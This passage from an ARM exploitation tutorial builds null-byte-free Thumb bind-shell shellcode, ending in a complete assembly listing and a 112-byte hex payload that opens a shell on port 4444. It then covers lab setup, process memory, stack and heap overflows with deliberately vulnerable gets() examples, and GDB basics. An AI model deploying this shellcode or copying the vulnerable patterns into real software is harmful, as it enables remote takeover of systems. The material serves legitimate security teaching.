    3. How to make a register point to a region in memory which stores constants and strings
  3. Use the right system call number to invoke the function and keep track of register content changes
    1. Keep in mind that the result of a system call will land in r0, which means that in case you need to reuse the result of that function in another function, you need to save it into another register before invoking the function.
    2. Example: host_sockid = socket(2, 1, 0) – the result (host_sockid) of the socket call will land in r0. This result is reused in other functions like listen(host_sockid, 2), and should therefore be preserved in another register.

0 – Switch to Thumb Mode

The first thing you should do to reduce the possibility of encountering null-bytes is to use Thumb mode. In Arm mode, the instructions are 32-bit, in Thumb mode they are 16-bit. This means that we can already reduce the chance of having null-bytes by simply reducing the size of our instructions. To recap how to switch to Thumb mode: ARM instructions must be 4 byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction’s address (found in PC) to 1 by adding 1 to the PC register’s value and saving it to another register. Then use a BX (Branch and eXchange) instruction to branch to this other register containing the address of the next instruction with the LSB set to one, which makes the processor switch to Thumb mode. It all boils down to the following two instructions.

.section .text
.global _start
_start:
    .ARM
    add     r3, pc, #1            
    bx      r3

From here you will be writing Thumb code and will therefore need to indicate this by using the .THUMB directive in your code.

1 – Create new Socket

 

These are the values we need for the socket call parameters:

root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/
/usr/include/linux/in.h: IPPROTO_IP = 0,                               // Dummy protocol for TCP 
/usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1,  // Sequenced, reliable, connection-based
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2       // IP protocol family. 
/usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET

After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our host_sockid and will end up in r0. Since we need host_sockid later on, let’s save it to r4.

In ARM, you can’t simply move any immediate value into a register. If you’re interested more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).

To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don’t look) called rotator.py.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 281
Sorry, 281 cannot be used as an immediate number and has to be split.

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 200
The number 200 can be used as a valid immediate number.
50 ror 30 --> 200

pi@raspberrypi:~/bindshell $ python rotator.py
Enter the value you want to check: 81
The number 81 can be used as a valid immediate number.
81 ror 0 --> 81

Final code snippet:

    .THUMB
    mov     r0, #2
    mov     r1, #1
    sub     r2, r2, r2
    mov     r7, #200
    add     r7, #81                // r7 = 281 (socket syscall number) 
    svc     #1                     // r0 = host_sockid value 
    mov     r4, r0                 // save host_sockid in r4

2 – Bind Socket to Local Port

 

With the first instruction, we store a structure object containing the address family, host port and host address in the literal pool and reference this object with pc-relative addressing. The literal pool is a memory area in the same section (because the literal pool is part of the code) storing constants, strings, or offsets. Instead of calculating the pc-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset where the address of the label is relative to the PC label. Like this:

// bind(r0, &sockaddr, 16)
 adr r1, struct_addr    // pointer to address, port
 [...]
struct_addr:
.ascii "\x02\xff"       // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"       // port number 4444 
.byte 1,1,1,1           // IP Address

The next 5 instructions are STRB (store byte) instructions. A STRB instruction stores one byte from a register to a calculated memory region. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset.

In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the local port we want to use, and the IP address. We could either use a static IP address, or we could specify 0.0.0.0 to make our bind shell listen on all IPs which the target is configured with, making our shellcode more portable. Now, those are a lot of null-bytes.

Again, the reason we want to get rid of any null-bytes is to make our shellcode usable for exploits that take advantage of memory corruption vulnerabilities that might be sensitive to null-bytes. Some buffer overflows are caused by improper use of functions like ‘strcpy’. The job of strcpy is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work. With the strb instruction we take a null byte from a register and modify our own code during execution. This way, we don’t actually have a null byte in our shellcode, but dynamically place it there. This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

For this reason, we code without null-bytes and dynamically put a null-byte in places where it’s necessary. As you can see in the next picture, the IP address we specify is 1.1.1.1 which will be replaced by 0.0.0.0 during execution.

 

The first STRB instruction replaces the placeholder xff in \x02\xff with x00 to set the AF_INET to \x02\x00. How do we know that it’s a null byte being stored? Because r2 contains 0’s only due to the “sub r2, r2, r2” instruction which cleared the register. The next 4 instructions replace 1.1.1.1 with 0.0.0.0. Instead of the four strb instructions after strb r2, [r1, #1], you can also use one single str r2, [r1, #4] to do a full 0.0.0.0 write.

The move instruction puts the length of the sockaddr_in structure length (2 bytes for AF_INET, 2 bytes for PORT, 4 bytes for ipaddress, 8 bytes padding = 16 bytes) into r2. Then, we set r7 to 282 by simply adding 1 to it, because r7 already contains 281 from the last syscall.

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr   // pointer to address, port
    strb r2, [r1, #1]     // write 0 for AF_INET
    strb r2, [r1, #4]     // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]     // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]     // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]     // replace 1 with 0 in 0.0.0.x
    mov r2, #16
    add r7, #1            // r7 = 281+1 = 282 (bind syscall number) 
    svc #1
    nop

3 – Listen for Incoming Connections

Here we put the previously saved host_sockid into r0. R1 is set to 2, and r7 is just increased by 2 since it still contains the 282 from the last syscall.

mov     r0, r4     // r0 = saved host_sockid 
mov     r1, #2
add     r7, #2     // r7 = 284 (listen syscall number)
svc     #1

4 – Accept Incoming Connection

 

Here again, we put the saved host_sockid into r0. Since we want to avoid null bytes, we use don’t directly move #0 into r1 and r2, but instead, set them to 0 by subtracting them from each other. R7 is just increased by 1. The result of this invocation will be our client_sockid, which we will save in r4, because we will no longer need the host_sockid that was kept there (we will skip the close function call from our C code).

    mov     r0, r4          // r0 = saved host_sockid 
    sub     r1, r1, r1      // clear r1, r1 = 0
    sub     r2, r2, r2      // clear r2, r2 = 0
    add     r7, #1          // r7 = 285 (accept syscall number)
    svc     #1
    mov     r4, r0          // save result (client_sockid) in r4

5 – STDIN, STDOUT, STDERR

 

For the dup2 functions, we need the syscall number 63. The saved client_sockid needs to be moved into r0 once again, and sub instruction sets r1 to 0. For the remaining two dup2 calls, we only need to change r1 and reset r0 to the client_sockid after each system call.

    /* dup2(client_sockid, 0) */
    mov     r7, #63                // r7 = 63 (dup2 syscall number) 
    mov     r0, r4                 // r4 is the saved client_sockid 
    sub     r1, r1, r1             // r1 = 0 (stdin) 
    svc     #1
    /* dup2(client_sockid, 1) */
    mov     r0, r4                 // r4 is the saved client_sockid 
    add     r1, #1                 // r1 = 1 (stdout) 
    svc     #1
    /* dup2(client_sockid, 2) */
    mov     r0, r4                 // r4 is the saved client_sockid
    add     r1, #1                 // r1 = 1+1 (stderr) 
    svc     #1

6 – Spawn the Shell

 

 

// execve("/bin/sh", 0, 0) 
 adr r0, shellcode     // r0 = location of "/bin/shX"
 eor r1, r1, r1        // clear register r1. R1 = 0
 eor r2, r2, r2        // clear register r2. r2 = 0
 strb r2, [r0, #7]     // store null-byte for AF_INET
 mov r7, #11           // execve syscall number
 svc #1
 nop

The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.

Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, IP address, and the “/bin/sh” string at the end of our assembly code.

struct_addr:
.ascii "\x02\xff"      // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c"     // port number 4444 
.byte 1,1,1,1        // IP Address 
shellcode:
.ascii "/bin/shX"
FINAL ASSEMBLY CODE

This is what our final bind shellcode looks like.

.section .text
.global _start
    _start:
    .ARM
    add r3, pc, #1         // switch to thumb mode 
    bx r3

    .THUMB
// socket(2, 1, 0)
    mov r0, #2
    mov r1, #1
    sub r2, r2, r2      // set r2 to null
    mov r7, #200        // r7 = 281 (socket)
    add r7, #81         // r7 value needs to be split 
    svc #1              // r0 = host_sockid value
    mov r4, r0          // save host_sockid in r4

// bind(r0, &sockaddr, 16)
    adr  r1, struct_addr // pointer to address, port
    strb r2, [r1, #1]    // write 0 for AF_INET
    strb r2, [r1, #4]    // replace 1 with 0 in x.1.1.1
    strb r2, [r1, #5]    // replace 1 with 0 in 0.x.1.1
    strb r2, [r1, #6]    // replace 1 with 0 in 0.0.x.1
    strb r2, [r1, #7]    // replace 1 with 0 in 0.0.0.x
    mov r2, #16          // struct address length
    add r7, #1           // r7 = 282 (bind) 
    svc #1
    nop

// listen(sockfd, 0) 
    mov r0, r4           // set r0 to saved host_sockid
    mov r1, #2        
    add r7, #2           // r7 = 284 (listen syscall number) 
    svc #1        

// accept(sockfd, NULL, NULL); 
    mov r0, r4           // set r0 to saved host_sockid
    sub r1, r1, r1       // set r1 to null
    sub r2, r2, r2       // set r2 to null
    add r7, #1           // r7 = 284+1 = 285 (accept syscall)
    svc #1               // r0 = client_sockid value
    mov r4, r0           // save new client_sockid value to r4  

// dup2(sockfd, 0) 
    mov r7, #63         // r7 = 63 (dup2 syscall number) 
    mov r0, r4          // r4 is the saved client_sockid 
    sub r1, r1, r1      // r1 = 0 (stdin) 
    svc #1

// dup2(sockfd, 1)
    mov r0, r4          // r4 is the saved client_sockid 
    add r1, #1          // r1 = 1 (stdout) 
    svc #1

// dup2(sockfd, 2) 
    mov r0, r4          // r4 is the saved client_sockid
    add r1, #1          // r1 = 2 (stderr) 
    svc #1

// execve("/bin/sh", 0, 0) 
    adr r0, shellcode   // r0 = location of "/bin/shX"
    eor r1, r1, r1      // clear register r1. R1 = 0
    eor r2, r2, r2      // clear register r2. r2 = 0
    strb r2, [r0, #7]   // store null-byte for AF_INET
    mov r7, #11         // execve syscall number
    svc #1
    nop

struct_addr:
.ascii "\x02\xff" // AF_INET 0xff will be NULLed 
.ascii "\x11\x5c" // port number 4444 
.byte 1,1,1,1 // IP Address 
shellcode:
.ascii "/bin/shX"
TESTING SHELLCODE

Save your assembly code into a file called bind_shell.s. Don’t forget the -N flag when using ld. The reason for this is that we use multiple the strb operations to modify our code section (.text). This requires the code section to be writable and can be achieved by adding the -N flag during the linking process.

pi@raspberrypi:~/bindshell $ as bind_shell.s -o bind_shell.o && ld -N bind_shell.o -o bind_shell
pi@raspberrypi:~/bindshell $ ./bind_shell

Then, connect to your specified port:

pi@raspberrypi:~ $ netcat -vv 0.0.0.0 4444
Connection to 0.0.0.0 4444 port [tcp/*] succeeded!
uname -a
Linux raspberrypi 4.4.34+ #3 Thu Dec 1 14:44:23 IST 2016 armv6l GNU/Linux

It works! Now let’s translate it into a hex string with the following command:

pi@raspberrypi:~/bindshell $ objcopy -O binary bind_shell bind_shell.bin
pi@raspberrypi:~/bindshell $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bind_shell.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\x20\x01\x21\x92\x1a\xc8\x27\x51\x37\x01\xdf\x04\x1c\x12\xa1\x4a\x70\x0a\x71\x4a\x71\x8a\x71\xca\x71\x10\x22\x01\x37\x01\xdf\xc0\x46\x20\x1c\x02\x21\x02\x37\x01\xdf\x20\x1c\x49\x1a\x92\x1a\x01\x37\x01\xdf\x04\x1c\x3f\x27\x20\x1c\x49\x1a\x01\xdf\x20\x1c\x01\x31\x01\xdf\x20\x1c\x01\x31\x01\xdf\x05\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58

Voilà, le bind shellcode! This shellcode is 112 bytes long. Since this is a beginner tutorial and to keep it simple, the shellcode is not as short as it could be. After making the initial shellcode work, you can try to find ways to reduce the amount of instructions, hence making the shellcode shorter.

ARM LAB ENVIRONMENT

Let’s say you got curious about ARM assembly or exploitation and want to write your first assembly scripts or solve some ARM challenges. For that you either need an Arm device (e.g. Raspberry Pi), or you set up your lab environment in a VM for quick access.

This page contains 3 levels of lab setup laziness.

  • Manual Setup – Level 0
  • Ain’t nobody got time for that – Level 1
  • Ain’t nobody got time for that – Level 2
MANUAL SETUP – LEVEL 0

If you have the time and nerves to set up the lab environment yourself, I’d recommend doing it. You might get stuck, but you might also learn a lot in the process. Knowing how to emulate things with QEMU also enables you to choose what ARM version you want to emulate in case you want to practice on a specific processor.

How to emulate Raspbian with QEMU.

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 1

Welcome on laziness level 1. I see you don’t have time to struggle through various linux and QEMU errors, or maybe you’ve tried setting it up yourself but some random error occurred and after spending hours trying to fix it, you’ve had enough.

Don’t worry, here’s a solution: Hugsy (aka creator of GEF) released ready-to-play Qemu images for architectures like ARM, MIPS, PowerPC, SPARC, AARCH64, etc. to play with. All you need is Qemu. Then download the link to your image, and unzip the archive.

Become a ninja on non-x86 architectures

AIN’T NOBODY GOT TIME FOR THAT – LEVEL 2

Let me guess, you don’t want to bother with any of this and just want a ready-made Ubuntu VM with all QEMU stuff setup and ready-to-play. Very well. The first Azeria-Labs VM is ready. It’s a naked Ubuntu VM containing an emulated ARMv6l.

This VM is also for those of you who tried emulating ARM with QEMU but got stuck for inexplicable linux reasons. I understand the struggle, trust me.

Download here:

VMware image size:

  • Downloaded zip: Azeria-Lab-v1.7z (4.62 GB)
    • MD5: C0EA2F16179CF813D26628DC792C5DE6
    • SHA1: 1BB1ABF3C277E0FD06AF0AECFEDF7289730657F2
  • Extracted VMware image: ~16GB

Password: azerialabs

Host system specs:

  • Ubuntu 16.04.3 LTS 64-bit (kernel 4.10.0-38-generic) with Gnome 3
  • HDD: ~26GB (ext4) + ~4GB Swap
  • RAM (configured): 4GB

QEMU setup:

  • Raspbian 8 (27-04-10-raspbian-jessie) 32-bit (kernel qemu-4.4.34-jessie)
  • HDD: ~8GB
  • RAM: ~256MB
  • Tools: GDB (Raspbian 7.7.1+dfsg-5+rpi1) with GEF

I’ve included a Lab VM Starter Guide and set it as the background image of the VM. It explains how to start up QEMU, how to write your first assembly program, how to assemble and disassemble, and some debugging basics. Enjoy!

ARM PROCESS MEMORY AND MEMORY CORRUPTIONS

PROCESS MEMORY AND MEMORY CORRUPTIONS

The prerequisite for this part of the tutorial is a basic understanding of ARM assembly (covered in the first tutorial series “ARM Assembly Basics“). In this chapter you will get an introduction into the memory layout of a process in a 32-bit Linux environment. After that you will learn the fundamentals of Stack and Heap related memory corruptions and how they look like in a debugger.

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer
  3. Format String

The examples used in this tutorial are compiled on an ARMv6 32-bit processor. If you don’t have access to an ARM device, you can create your own lab and emulate a Raspberry Pi distro in a VM by following this tutorial: Emulate Raspberry Pi with QEMU. The debugger used here is GDB with GEF (GDB Enhanced Features). If you aren’t familiar with these tools, you can check out this tutorial: Debugging with GDB and GEF.

MEMORY LAYOUT OF A PROCESS

Every time we start a program, a memory area for that program is reserved. This area is then split into multiple regions. Those regions are then split into even more regions (segments), but we will stick with the general overview. So, the parts we are interested are:

  1. Program Image
  2. Heap
  3. Stack

In the picture below we can see a general representation of how those parts are laid out within the process memory. The addresses used to specify memory regions are just for the sake of an example, because they will differ from environment to environment, especially when ASLR is used.

Program Image region basically holds the program’s executable file which got loaded into the memory. This memory region can be split into various segments: .plt, .text, .got, .data, .bss and so on. These are the most relevant. For example, .text contains the executable part of the program with all the Assembly instructions, .data and .bss holds the variables or pointers to variables used in the application, .plt and .got stores specific pointers to various imported functions from, for example, shared libraries. From a security standpoint, if an attacker could affect the integrity (rewrite) of the .text section, he could execute arbitrary code. Similarly, corruption of Procedure Linkage Table (.plt) and Global Offsets Table (.got) could under specific circumstances lead to execution of arbitrary code.

The Stack and Heap regions are used by the application to store and operate on temporary data (variables) that are used during the execution of the program. These regions are commonly exploited by attackers, because data in the Stack and Heap regions can often be modified by the user’s input, which, if not handled properly, can cause a memory corruption. We will look into such cases later in this chapter.

In addition to the mapping of the memory, we need to be aware of the attributes associated with different memory regions. A memory region can have one or a combination of the following attributes: Read, Write, eXecute. The Read attribute allows the program to read data from a specific region. Similarly, Write allows the program to write data into a specific memory region, and Execute – execute instructions in that memory region. We can see the process memory regions in GEF (a highly recommended extension for GDB) as shown below:

azeria@labs:~/exp $ gdb program
...
gef> gef config context.layout "code"
gef> break main
Breakpoint 1 at 0x104c4: file program.c, line 6.
gef> run
...
gef> nexti 2
-----------------------------------------------------------------------------------------[ code:arm ]----
...
      0x104c4 <main+20>        mov    r0,  #8
      0x104c8 <main+24>        bl     0x1034c <malloc@plt>
->    0x104cc <main+28>        mov    r3,  r0
      0x104d0 <main+32>        str    r3,  [r11,  #-8]
...
gef> vmmap
Start      End        Offset     Perm Path
0x00010000 0x00011000 0x00000000 r-x /home/azeria/exp/program <---- Program Image
0x00020000 0x00021000 0x00000000 rw- /home/azeria/exp/program <---- Program Image continues...
0x00021000 0x00042000 0x00000000 rw- [heap] <---- HEAP
0xb6e74000 0xb6f9f000 0x00000000 r-x /lib/arm-linux-gnueabihf/libc-2.19.so <---- Shared library (libc)
0xb6f9f000 0xb6faf000 0x0012b000 --- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6faf000 0xb6fb1000 0x0012b000 r-- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb1000 0xb6fb2000 0x0012d000 rw- /lib/arm-linux-gnueabihf/libc-2.19.so <---- libc continues...
0xb6fb2000 0xb6fb5000 0x00000000 rw-
0xb6fcc000 0xb6fec000 0x00000000 r-x /lib/arm-linux-gnueabihf/ld-2.19.so <---- Shared library (ld)
0xb6ffa000 0xb6ffb000 0x00000000 rw-
0xb6ffb000 0xb6ffc000 0x0001f000 r-- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffc000 0xb6ffd000 0x00020000 rw- /lib/arm-linux-gnueabihf/ld-2.19.so <---- ld continues...
0xb6ffd000 0xb6fff000 0x00000000 rw-
0xb6fff000 0xb7000000 0x00000000 r-x [sigpage]
0xbefdf000 0xbf000000 0x00000000 rw- [stack] <---- STACK
0xffff0000 0xffff1000 0x00000000 r-x [vectors]

The Heap section in the vmmap command output appears only after some Heap related function was used. In this case we see the malloc function being used to create a buffer in the Heap region. So if you want to try this out, you would need to debug a program that makes a malloc call (you can find some examples in this page, scroll down or use find function).

Additionally, in Linux we can inspect the process’ memory layout by accessing a process-specific “file”:

azeria@labs:~/exp $ ps aux | grep program
azeria   31661 12.3 12.1  38680 30756 pts/0    S+   23:04   0:10 gdb program
azeria   31665  0.1  0.2   1712   748 pts/0    t    23:04   0:00 /home/azeria/exp/program
azeria   31670  0.0  0.7   4180  1876 pts/1    S+   23:05   0:00 grep --color=auto program
azeria@labs:~/exp $ cat /proc/31665/maps
00010000-00011000 r-xp 00000000 08:02 274721     /home/azeria/exp/program
00020000-00021000 rw-p 00000000 08:02 274721     /home/azeria/exp/program
00021000-00042000 rw-p 00000000 00:00 0          [heap]
b6e74000-b6f9f000 r-xp 00000000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6f9f000-b6faf000 ---p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6faf000-b6fb1000 r--p 0012b000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb1000-b6fb2000 rw-p 0012d000 08:02 132394     /lib/arm-linux-gnueabihf/libc-2.19.so
b6fb2000-b6fb5000 rw-p 00000000 00:00 0
b6fcc000-b6fec000 r-xp 00000000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffa000-b6ffb000 rw-p 00000000 00:00 0
b6ffb000-b6ffc000 r--p 0001f000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffc000-b6ffd000 rw-p 00020000 08:02 132358     /lib/arm-linux-gnueabihf/ld-2.19.so
b6ffd000-b6fff000 rw-p 00000000 00:00 0
b6fff000-b7000000 r-xp 00000000 00:00 0          [sigpage]
befdf000-bf000000 rw-p 00000000 00:00 0          [stack]
ffff0000-ffff1000 r-xp 00000000 00:00 0          [vectors]

Most programs are compiled in a way that they use shared libraries. Those libraries are not part of the program image (even though it is possible to include them via static linking) and therefore have to be referenced (included) dynamically. As a result, we see the libraries (libc, ld, etc.) being loaded in the memory layout of a process. Roughly speaking, the shared libraries are loaded somewhere in the memory (outside of process’ control) and our program just creates virtual “links” to that memory region. This way we save memory without the need to load the same library in every instance of a program.

INTRODUCTION INTO MEMORY CORRUPTIONS

A memory corruption is a software bug type that allows to modify the memory in a way that was not intended by the programmer. In most cases, this condition can be exploited to execute arbitrary code, disable security mechanisms, etc. This is done by crafting and injecting a payload which alters certain memory sections of a running program. The following list contains the most common memory corruption types/vulnerabilities:

  1. Buffer Overflows
    • Stack Overflow
    • Heap Overflow
  2. Dangling Pointer (Use-after-free)
  3. Format String

In this chapter we will try to get familiar with the basics of Buffer Overflow memory corruption vulnerabilities (the remaining ones will be covered in the next chapter). In the examples we are about to cover we will see that the main cause of memory corruption vulnerabilities is an improper user input validation, sometimes combined with a logical flaw. For a program, the input (or a malicious payload) might come in a form of a username, file to be opened, network packet, etc. and can often be influenced by the user. If a programmer did not put safety measures for potentially harmful user input it is often the case that the target program will be subject to some kind of memory related issue.

BUFFER OVERFLOWS

Buffer overflows are one of the most widespread memory corruption classes and are usually caused by a programming mistake which allows the user to supply more data than there is available for the destination variable (buffer). This happens, for example, when vulnerable functions, such as getsstrcpymemcpy or others are used along with data supplied by the user. These functions do not check the length of the user’s data which can result into writing past (overflowing) the allocated buffer. To get a better understanding, we will look into basics of Stack and Heap based buffer overflows.

Stack Overflow

Stack overflow, as the name suggests, is a memory corruption affecting the Stack. While in most cases arbitrary corruption of the Stack would most likely result in a program’s crash, a carefully crafted Stack buffer overflow can lead to arbitrary code execution. The following picture shows an abstract overview of how the Stack can get corrupted.

As you can see in the picture above, the Stack frame (a small part of the whole Stack dedicated for a specific function) can have various components: user data, previous Frame Pointer, previous Link Register, etc. In case the user provides too much of data for a controlled variable, the FP and LR fields might get overwritten. This breaks the execution of the program, because the user corrupts the address where the application will return/jump after the current function is finished.

To check how it looks like in practice we can use this example:

/*azeria@labs:~/exp $ gcc stack.c -o stack*/
#include "stdio.h"

int main(int argc, char **argv)
{
char buffer[8];
gets(buffer);
}

Our sample program uses the variable “buffer”, with the length of 8 characters, and a function “gets” for user’s input, which simply sets the value of the variable “buffer” to whatever input the user provides. The disassembled code of this program looks like the following:

Here we suspect that a memory corruption could happen right after the function “gets” is completed. To investigate this, we place a break-point right after the branch instruction that calls the “gets” function – in our case, at address 0x0001043c. To reduce the noise we configure GEF’s layout to show us only the code and the Stack (see the command in the picture below). Once the break-point is set, we proceed with the program and provide 7 A’s as the user’s input (we use 7 A’s, because a null-byte will be automatically appended by function “gets”).

When we investigate the Stack of our example we see (image above) that the Stack frame is not corrupted. This is because the input supplied by the user fits in the expected 8 byte buffer and the previous FP and LR values within the Stack frame are not corrupted. Now let’s provide 16 A’s and see what happens.

In the second example we see (image above) that when we provide too much of data for the function “gets”, it does not stop at the boundaries of the target buffer and keeps writing “down the Stack”. This causes our previous FP and LR values to be corrupted. When we continue running the program, the program crashes (causes a “Segmentation fault”), because during the epilogue of the current function the previous values of FP and LR are “poped” off the Stack into R11 and PC registers forcing the program to jump to address 0x41414140 (last byte gets automatically converted to 0x40 because of the switch to Thumb mode), which in this case is an illegal address. The picture below shows us the values of the registers (take a look at $pc) at the time of the crash.

Heap Overflow

First of all, Heap is a more complicated memory location, mainly because of the way it is managed. To keep things simple, we stick with the fact that every object placed in the Heap memory section is “packed” into a “chunk” having two parts: header and user data (which sometimes the user controls fully). In the Heap’s case, the memory corruption happens when the user is able to write more data than is expected. In that case, the corruption might happen within the chunk’s boundaries (intra-chunk Heap overflow), or across the boundaries of two (or more) chunks (inter-chunk Heap overflow). To put things in perspective, let’s take a look at the following illustration.

As shown in the illustration above, the intra-chunk heap overflow happens when the user has the ability to supply more data to u_data_1and cross the boundary between u_data_1 and u_data_2. In this way the fields/properties of the current object get corrupted. If the user supplies more data than the current Heap chunk can accommodate, then the overflow becomes inter-chunk and results into a corruption of the adjacent chunk(s).

Intra-chunk Heap overflow

To illustrate how an intra-chunk Heap overflow looks like in practice we can use the following example and compile it with “-O” (optimization flag) to have a smaller (binary) program (easier to look through).

/*azeria@labs:~/exp $ gcc intra_chunk.c -o intra_chunk -O*/
#include "stdlib.h"
#include "stdio.h"

struct u_data                                          //object model: 8 bytes for name, 4 bytes for number
{
 char name[8];
 int number;
};

int main ( int argc, char* argv[] )
{
 struct u_data* objA = malloc(sizeof(struct u_data)); //create object in Heap

 objA->number = 1234;                                 //set the number of our object to a static value
 gets(objA->name);                                    //set name of our object according to user's input

 if(objA->number == 1234)                             //check if static value is intact
 {
  puts("Memory valid");
 }
 else                                                 //proceed here in case the static value gets corrupted
 {
  puts("Memory corrupted");
 }
}

The program above does the following:

  1. Defines a data structure (u_data) with two fields
  2. Creates an object (in the Heap memory region) of type u_data
  3. Assigns a static value to the number’s field of the object
  4. Prompts user to supply a value for the name’s field of the object
  5. Prints a string depending on the value of the number’s field

So in this case we also suspect that the corruption might happen after the function “gets”. We disassemble the target program’s main function to get the address for a break-point.

In this case we set the break-point at address 0x00010498 – right after the function “gets” is completed. We configure GEF to show us the code only. We then run the program and provide 7 A’s as a user input.

Once the break-point is hit, we quickly lookup the memory layout of our program to find where our Heap is. We use vmmap command and see that our Heap starts at the address 0x00021000. Given the fact that our object (objA) is the first and the only one created by the program, we start analyzing the Heap right from the beginning.

The picture above shows us a detailed break down of the Heap’s chunk associated with our object. The chunk has a header (8 bytes) and the user’s data section (12 bytes) storing our object. We see that the name field properly stores the supplied string of 7 A’s, terminated by a null-byte. The number field, stores 0x4d2 (1234 in decimal). So far so good. Let’s repeat these steps, but in this case enter 8 A’s.

While examining the Heap this time we see that the number’s field got corrupted (it’s now equal to 0x400 instead of 0x4d2). The null-byte terminator overwrote a portion (last byte) of the number’s field. This results in an intra-chunk Heap memory corruption. Effects of such a corruption in this case are not devastating, but visible. Logically, the else statement in the code should never be reached as the number’s field is intended to be static. However, the memory corruption we just observed makes it possible to reach that part of the code. This can be easily confirmed by the example below.

Inter-chunk Heap overflow

To illustrate how an inter-chunk Heap overflow looks like in practice we can use the following example, which we now compile withoutoptimization flag.

/*azeria@labs:~/exp $ gcc inter_chunk.c -o inter_chunk*/
#include "stdlib.h"
#include "stdio.h"

int main ( int argc, char* argv[] )
{
 char *some_string = malloc(8);  //create some_string "object" in Heap
 int *some_number = malloc(4);   //create some_number "object" in Heap

 *some_number = 1234;            //assign some_number a static value
 gets(some_string);              //ask user for input for some_string

 if(*some_number == 1234)        //check if static value (of some_number) is in tact
 {
 puts("Memory valid");
 }
 else                            //proceed here in case the static some_number gets corrupted
 {
 puts("Memory corrupted");
 }
}

The process here is similar to the previous ones: set a break-point after function “gets”, run the program, supply 7 A’s, investigate Heap.

Once the break-point is hit, we examine the Heap. In this case, we have two chunks. We see (image below) that their structure is in tact: the some_string is within its boundaries, the some_number is equal to 0x4d2.

Now, let’s supply 16 A’s and see what happens.

As you might have guessed, providing too much of input causes the overflow resulting into corruption of the adjacent chunk. In this case we see that our user input corrupted the header and the first byte of the some_number’s field. Here again, by corrupting the some_number we manage to reach the code section which logically should never be reached.

SUMMARY

In this part of the tutorial we got familiar with the process memory layout and the basics of Stack and Heap related memory corruptions. In the next part of this tutorial series we will cover other memory corruptions: Dangling pointer and Format String. Once we cover the most common types of memory corruptions, we will be ready for learning how to write working exploits.

ARM DEBUGGING WITH GDB

DEBUGGING WITH GDB

This is a very brief introduction into compiling ARM binaries and basic debugging with GDB. As you follow the tutorials, you might want to follow along and experiment with ARM assembly on your own. In that case, you would either need a spare ARM device, or you just set up your own Lab environment in a VM by following the steps in this short How-To.

You can use the following code from Stack and Functions, to get familiar with basic debugging with GDB.

.section .text
.global _start

_start:
    push {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #16   /* End of the prologue. Allocating some buffer on the stack */
    mov r0, #1        /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    mov r1, #2        /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    bl max            /* Calling/branching to function max */
    sub sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11, pc}     /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

max:
    push {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add r11, sp, #0   /* Setting up the bottom of the stack frame */
    sub sp, sp, #12   /* End of the prologue. Allocating some buffer on the stack */
    cmp r0, r1        /* Implementation of if(a<b) */
    movlt r0, r1      /* if r0 was lower than r1, store r1 into r0 */
    add sp, r11, #0   /* Start of the epilogue. Readjusting the Stack Pointer */
    pop {r11}         /* restoring frame pointer */
    bx lr             /* End of the epilogue. Jumping back to main via LR register */

Personally, I prefer using GEF as a GDB extension. It gives me a better overview and useful features. You can try it out here: GEF – GDB Enhanced Features.

Save the code above in a file called max.s and compile it with the following commands:

$ as max.s -o max.o
$ ld max.o -o max

The debugger is a powerful tool that can:

  • Load a memory dump after a crash (post-mortem debugging)
  • Attach to a running process (used for server processes)
  • Launch a program and debug it

Launch GDB against either a binary, a core file, or a Process ID:

  • Attach to a process: $ gdb -pid $(pidof <process>)
  • Debug a binary: $ gdb ./file
  • Inspect a core (crash) file: $ gdb -c ./core.3243
$ gdb max

If you installed GEF, it drops you the gef> prompt.

This is how you get help:

